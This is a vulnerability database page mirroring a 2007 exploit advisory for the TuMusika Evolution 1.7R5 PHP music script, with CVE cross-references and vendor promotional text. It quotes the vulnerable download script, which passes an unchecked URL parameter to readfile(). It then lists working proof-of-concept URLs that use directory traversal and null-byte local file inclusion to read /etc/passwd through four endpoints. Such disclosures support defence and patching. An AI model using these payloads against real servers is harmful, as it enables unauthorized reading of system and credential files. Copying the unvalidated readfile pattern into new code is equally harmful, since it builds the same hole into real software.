Lucene search
+L

TuMusika Evolution 1.7R5 - Remote File Disclosure

🗓️ 28 Nov 2007 00:00:00Reported by GoLd_MType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

TuMusika Evolution 1.7R5 - Remote File Disclosure & Local File Inclusion Vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-6188
30 Nov 200701:00
cve
cve
CVE
CVE-2007-6221
4 Dec 200717:00
cve
cvelist
Cvelist
CVE-2007-6188
30 Nov 200701:00
cvelist
cvelist
Cvelist
CVE-2007-6221
4 Dec 200717:00
cvelist
euvd
EUVD
EUVD-2007-6189
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-6188
30 Nov 200701:46
nvd
nvd
NVD
CVE-2007-6221
4 Dec 200717:46
nvd
prion
Prion
Directory traversal
30 Nov 200701:46
prion
prion
Prion
Information disclosure
4 Dec 200717:46
prion
TuMusika Evolution 1.7R5 Remote File Disclosure Vulnerability
Script : http://sourceforge.net/project/platformdownload.php?group_id=186000
#################/frames/nogui/sc_download.php#################
<?
$file = $_GET['uri'] ;<---[xxx]
$title = $_GET['title'] ;
header('HTTP/1.1 200 OK');
header("content-type:audio/mp3");
header('Content-Disposition: attachment; filename="'.$title.'.mp3"' );
readfile($file);<---[xxx]
?>
###############################################################
Exploit:
/Evolution1.7/frames/nogui/sc_download.php?uri=../../../../../../etc/passwd
###############################################################
TuMusika Evolution 1.7R5 Local File Inclusion Vulnerabiliies
POC:
/Evolution1.7/inc/languages_n.php?language=../../../../../../etc/passwd%00
/Evolution1.7/inc/languages_f.php?language=../../../../../../etc/passwd%00
/Evolution1.7/inc/languages.php?language=../../../../../../etc/passwd%00

# milw0rm.com [2007-11-28]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.0398
41